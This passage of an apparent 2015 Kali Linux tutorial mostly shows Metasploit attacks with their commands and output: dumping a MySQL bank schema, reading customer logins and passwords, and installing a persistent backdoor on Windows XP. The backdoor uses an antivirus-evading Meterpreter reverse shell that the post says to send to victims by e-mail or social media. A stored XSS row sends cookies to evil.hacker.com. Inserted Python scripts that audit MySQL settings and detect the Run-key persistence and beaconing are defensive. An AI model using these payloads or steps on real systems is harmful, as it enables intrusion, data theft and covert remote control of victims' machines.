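Read from the defender's side, this output is a list of what to fix. The following added example (not part of the post) parses mysql_enum output in the format above and turns it into findings: weak settings, accounts that may log in from any host, privileged accounts reachable from any host, a username containing '@' (a quoting slip when the account was created, which is why anon@localhost is open to '%'), and distinct usernames sharing one password hash. The excerpt it runs on is constructed in the same format; a practitioner would feed it the saved module output.

```python
import re
from collections import defaultdict

# Settings mysql_enum prints, the value that is a weakness, and what to change
WEAK_SETTINGS = {
    "Logging of queries and logins": ("OFF", "set log_warnings=2 so failed logins reach the error log"),
    "Loading of local files": ("ON", "set local_infile=0 unless LOAD DATA LOCAL INFILE is required"),
    "SSL Connection": ("DISABLED", "configure ssl-ca/ssl-cert/ssl-key so logins are not sent in clear text"),
    "Logins with old Pre-4.1 Passwords": ("ON", "set secure_auth=1 to reject pre-4.1 password hashes"),
}
# Privileges that give an account server-level control
DANGEROUS_PRIVS = {"GRANT", "CREATE USER", "SUPER", "FILE", "SHUTDOWN", "PROCESS", "RELOAD"}

SETTING_RE = re.compile(r"^\[\*\]\s+(?P<name>[^:]+?):?\s+(?P<value>ON|OFF|ENABLED|DISABLED)\s*$")
PRIV_RE = re.compile(r"^\[\*\]\s+The following users have (?P<priv>.+?) Privilege:")
ACCOUNT_RE = re.compile(r"^\[\*\]\s+User: (?P<user>\S+) Host: (?P<host>\S+)(?: Password Hash: (?P<hash>\S+))?\s*$")


def audit_enum_output(text):
    """Return (severity, finding) tuples derived from mysql_enum output."""
    findings = []
    users_by_hash = defaultdict(set)   # password hash -> usernames using it
    privs = defaultdict(set)           # (user, host) -> privileges held
    section_priv = None                # privilege named by the current section header
    for line in text.splitlines():
        m = SETTING_RE.match(line)
        if m:
            name, value = m.group("name").strip(), m.group("value")
            if name in WEAK_SETTINGS and value == WEAK_SETTINGS[name][0]:
                findings.append(("medium", "%s is %s: %s" % (name, value, WEAK_SETTINGS[name][1])))
            continue
        m = PRIV_RE.match(line)
        if m:
            section_priv = m.group("priv")
            continue
        m = ACCOUNT_RE.match(line)
        if not m:
            if line.startswith("[*]"):
                section_priv = None    # some other section header
            continue
        user, host, pw_hash = m.group("user"), m.group("host"), m.group("hash")
        if pw_hash:                    # line from the account listing
            users_by_hash[pw_hash].add(user)
            if "@" in user:
                findings.append(("high", "username '%s' contains '@': it was probably created with "
                                 "user@host inside one quoted string, so it matches host '%s'" % (user, host)))
            if host == "%":
                findings.append(("high" if user == "root" else "medium",
                                 "%s@%% can log in from any source host" % user))
        elif section_priv:             # line from a privilege section
            privs[(user, host)].add(section_priv)
    for (user, host), held in sorted(privs.items()):
        risky = sorted(held & DANGEROUS_PRIVS)
        if host == "%" and risky:
            findings.append(("high", "%s@%% holds %s and is reachable from any host" % (user, ", ".join(risky))))
    for pw_hash, users in users_by_hash.items():
        if len(users) > 1:
            findings.append(("low", "accounts %s share one password hash (same password)" % ", ".join(sorted(users))))
    return findings


# Constructed excerpt in the format mysql_enum printed above
SAMPLE_ENUM = """\
[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.5.35-MariaDB
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     SSL Connection: DISABLED
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]         User: root Host: localhost Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*]         User: shabbir Host: % Password Hash: *8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
[*]         User: anon@localhost Host: % Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[*]         User: anon Host: localhost Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[*]         User: root Host: % Password Hash: *01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C
[*]     The following users have FILE Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: %
[*]     The following accounts are not restricted by source:
[*]         User: root Host: %
[*] Auxiliary module execution completed
"""

if __name__ == "__main__":
    for severity, finding in audit_enum_output(SAMPLE_ENUM):
        print("[%s] %s" % (severity, finding))
```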


6) Dump the MySQL server's database schema.

msf > info auxiliary/scanner/mysql/mysql_schemadump

       Name: MYSQL Schema Dump
     Module: auxiliary/scanner/mysql/mysql_schemadump
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  theLightCosine <theLightCosine@metasploit.com>

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  DISPLAY_RESULTS  true             yes       Display the Results to the Screen
  PASSWORD                          no        The password for the specified username
  RHOSTS                            yes       The target address range or CIDR identifier
  RPORT            3306             yes       The target port
  THREADS          1                yes       The number of concurrent threads
  USERNAME                          no        The username to authenticate as

Description:
  This module extracts the schema information from a MySQL DB server.

msf > use auxiliary/scanner/mysql/mysql_schemadump 

msf auxiliary(mysql_schemadump) > set USERNAME shabbir
USERNAME => shabbir
msf auxiliary(mysql_schemadump) > set PASSWORD shabbir
PASSWORD => shabbir

msf auxiliary(mysql_schemadump) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1

msf auxiliary(mysql_schemadump) > run

[*] Schema stored in: /root/.msf4/loot/20150627113706_default_192.168.122.1_mysql_schema_138881.txt
[+] MySQL Server Schema
 Host: 192.168.122.1
 Port: 3306
 ====================

---
- DBName: mybank
  Tables:
  - TableName: customer
    Columns:
    - ColumnName: loginid
      ColumnType: varchar(50)
    - ColumnName: passwd
      ColumnType: varchar(50)
    - ColumnName: custname
      ColumnType: varchar(100)
    - ColumnName: accountno
      ColumnType: int(11)
    - ColumnName: balance
      ColumnType: decimal(10,2)
    - ColumnName: address
      ColumnType: varchar(500)
    - ColumnName: mobile
      ColumnType: varchar(50)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



7) Run an SQL query.

msf auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > show options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   PASSWORD                    no        The password for the specified username
   RHOST                       yes       The target address
   RPORT     3306              yes       The target port
   SQL       select version()  yes       The SQL to execute.
   USERNAME                    no        The username to authenticate as

msf auxiliary(mysql_sql) > set RHOST 192.168.122.1 
RHOST => 192.168.122.1

msf auxiliary(mysql_sql) > set username shabbir
username => shabbir


msf auxiliary(mysql_sql) > set password shabbir
password => shabbir


msf auxiliary(mysql_sql) > set sql select * from mybank.customer
sql => select * from mybank.customer
 

msf auxiliary(mysql_sql) > run

[*] Sending statement: 'select * from mybank.customer'...
[*]  | batul | dahod | batul ben dahod | 1234 | 25000.00 | fdfdfdfdfd | 5454545454 |
[*]  | shabbir | shabbir | shabbir rangwala | 1000 | 49000.00 | dkdkdkdkd dkdkdkdkd | 193933030 |
[*]  | taher | taher | taher saifee | 2000 | 8000.00 | dddl fkfkfl flflflfll | 122222233 |
[*]  | trudy | trudy | trudy chennai | 1050 | 20000.00 | <a href=# onclick="document.location='http://evil.hacker.com/xss.php?c='+escape(document.cookie);"My Address</a> | 2345678531 |
[*] Auxiliary module execution completed



Thursday, 25 June 2015

Install Backdoor in Windows XP using Metasploit in Kali Linux


We have the following scenario:

Victim (Windows XP Machine) IP Address:  192.168.1.2

Attacker (Kali Linux Machine)     IP Address:  192.168.1.3

We will use the Social Engineering Toolkit in Kali Linux to generate a malicious executable payload that, when run on the Windows XP machine, gives the attacker complete access to the victim's machine. The attacker then uses Metasploit to install a permanent backdoor on the victim machine.

We will perform the following steps:
1) Create malicious payload
2) Give the payload to the Victim.
3) Create listener (for the payload) on the Attacker on port 443.
4) When the user executes the payload, the Victim connects to the Attacker on port 443.
5) Escalate privilege to Windows user SYSTEM.
6) Install backdoor on the Victim.
7) Create listener (for the backdoor) on the Attacker on port 80.
8) Whenever the Victim boots, it automatically connects to the Attacker.

Perform the following steps on the Attacker (Kali Linux) Machine:

1) Create malicious executable payload.
1.1) Start Social Engineering Toolkit.
root@kali:~# setoolkit

1.2) Select option 1) Social Engineering Attacks
set> 1

1.3) Select option 4) Create a Payload and Listener
set> 4
set:payloads> Enter the IP address for the payload (reverse):192.168.1.3

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system

set:payloads>2

Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.

   1) shikata_ga_nai
   2) No Encoding
   3) Multi-Encoder
   4) Backdoored Executable

set:encoding>1
set:payloads> PORT of the listener [443]:
[-] Encoding the payload 4 times. [-]

[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=4)

[*] Your payload is now in the root directory of SET as payload.exe
[-] The payload can be found in the SET home directory.
set> Start the listener now? [yes|no]: no


2) We need to send this payload file /usr/share/set/payload.exe to the Victim using social media, e-mail, uploading it to a server, or any other delivery method of choice.


3) Set up a handler on the Attacker machine using Metasploit.
3.1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.

3.2) Start metasploit console.
root@kali:~# msfconsole
msf >

3.3) Select exploit.
msf > use exploit/multi/handler
 
3.4) Select payload.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

3.5) View options
msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

3.6) Set options
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 443
LPORT => 443

3.7) Execute exploit
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.3:443
[*] Starting the payload handler...


4) As soon as the victim runs the executable file, the payload will make a connection to the attacker system, giving the attacker complete control of the victim machine.
 
[*] Sending stage (769536 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.3:443 -> 192.168.1.2:1038) at 2015-06-25 06:52:57 +0530

meterpreter > sysinfo
Computer        : WINSETU
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

5) Escalate privilege

meterpreter > getuid
Server username: WINSETU\shabbir

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


6) Install backdoor on the victim machine.

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back


meterpreter > run persistence -X -i 10 -p 80 -r 192.168.1.3
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINSETU_20150625.1651/WINSETU_20150625.1651.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=80
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
[*] Executing script C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
[+] Agent executed with PID 3648
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu
meterpreter >
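The persistence script above drops a .vbs into the user's Temp directory and registers it under the HKLM Run key with a random value name. As an added defender-side example (not part of the original post), the following Python script parses the text that `reg query` prints for a Run key (constructed sample lines here, including a hypothetical entry in the same style as the one installed above) and flags entries that launch from a Temp directory, point at a script file, or invoke a script interpreter.

```python
import re

# Constructed sample output in the layout printed by `reg query HKLM\...\Run`.
# All four entries are hypothetical; the second mimics the autorun entry above.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    YHxeQVYtYjmIYu    REG_SZ    C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
    Updater           REG_SZ    wscript.exe "C:\Users\Public\update.vbs"
    OneDrive          REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
"""

SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|ps1|bat|cmd|hta)\b", re.IGNORECASE)
INTERPRETER = re.compile(r"\b(wscript|cscript|mshta|powershell|cmd)(\.exe)?\b", re.IGNORECASE)
TEMP_PATH = re.compile(r"\\(LOCALS~1\\)?Temp\\|%TEMP%|\\AppData\\Local\\Temp\\", re.IGNORECASE)
ENTRY = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*\S)\s*$")  # "name  type  data"

def parse_run_entries(text):
    """Return (value_name, data) pairs from `reg query` output text."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            entries.append((m.group(1), m.group(3)))
    return entries

def suspicious_reasons(data):
    """List the reasons a Run-key command line looks like script persistence."""
    reasons = []
    if TEMP_PATH.search(data):
        reasons.append("launches from a Temp directory")
    if SCRIPT_EXT.search(data):
        reasons.append("points at a script file")
    if INTERPRETER.search(data):
        reasons.append("invokes a script interpreter")
    return reasons

def flag_autoruns(text):
    """Map each suspicious value name to its list of reasons."""
    flagged = {}
    for name, data in parse_run_entries(text):
        reasons = suspicious_reasons(data)
        if reasons:
            flagged[name] = reasons
    return flagged

if __name__ == "__main__":
    for name, reasons in flag_autoruns(SAMPLE_REG_QUERY).items():
        print(f"{name}: {'; '.join(reasons)}")
```

On a live host, feed the script the output of `reg query` for both the HKLM and HKCU Run keys, since the `-U` option of the persistence script uses the per-user key instead.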


7) Start a handler for the backdoor on the Attacker machine, listening on port 80.
meterpreter > background
[*] Backgrounding session 1...

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3

msf exploit(handler) > set LPORT 80
LPORT => 80

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.3:80
[*] Starting the payload handler...


8) Now, whenever the victim machine boots, it will automatically connect to the Attacker machine on port 80.
[*] Sending stage (769536 bytes) to 192.168.1.2
[*] Meterpreter session 2 opened (192.168.1.3:80 -> 192.168.1.2:1051) at 2015-06-25 07:19:35 +0530

meterpreter >
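Because the agent was installed with `-i 10`, the victim retries its connection to 192.168.1.3:80 every 10 seconds from boot, which gives the traffic a regular rhythm that ordinary browsing lacks. As an added defender-side example (not part of the original post), the following Python script groups constructed connection-log lines (hypothetical "time src dst:port" format) by flow and reports flows whose inter-connection gaps are nearly constant.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed connection-log lines in a hypothetical "time src dst:port" format.
# The 192.168.1.2 -> 192.168.1.3:80 lines mimic the agent above retrying every
# 10 seconds; the 93.184.216.34:443 lines stand in for ordinary browsing.
SAMPLE_CONN_LOG = """\
2015-06-25T07:19:05 192.168.1.2 192.168.1.3:80
2015-06-25T07:19:15 192.168.1.2 192.168.1.3:80
2015-06-25T07:19:17 192.168.1.2 93.184.216.34:443
2015-06-25T07:19:25 192.168.1.2 192.168.1.3:80
2015-06-25T07:19:35 192.168.1.2 192.168.1.3:80
2015-06-25T07:19:41 192.168.1.2 93.184.216.34:443
2015-06-25T07:19:45 192.168.1.2 192.168.1.3:80
2015-06-25T07:21:03 192.168.1.2 93.184.216.34:443
"""

def parse_conn_log(text):
    """Group connection timestamps by (src, dst:port) flow."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows

def find_beacons(text, min_hits=4, max_jitter=0.2):
    """Return {flow: mean_gap_seconds} for flows that beacon at a steady rate.

    A flow is reported when it has at least `min_hits` connections and the
    standard deviation of its gaps is at most `max_jitter` times the mean gap.
    """
    beacons = {}
    for flow, stamps in parse_conn_log(text).items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) <= max_jitter * avg:
            beacons[flow] = round(avg, 1)
    return beacons

if __name__ == "__main__":
    for (src, dst), gap in find_beacons(SAMPLE_CONN_LOG).items():
        print(f"{src} -> {dst}: beacon every ~{gap}s")
```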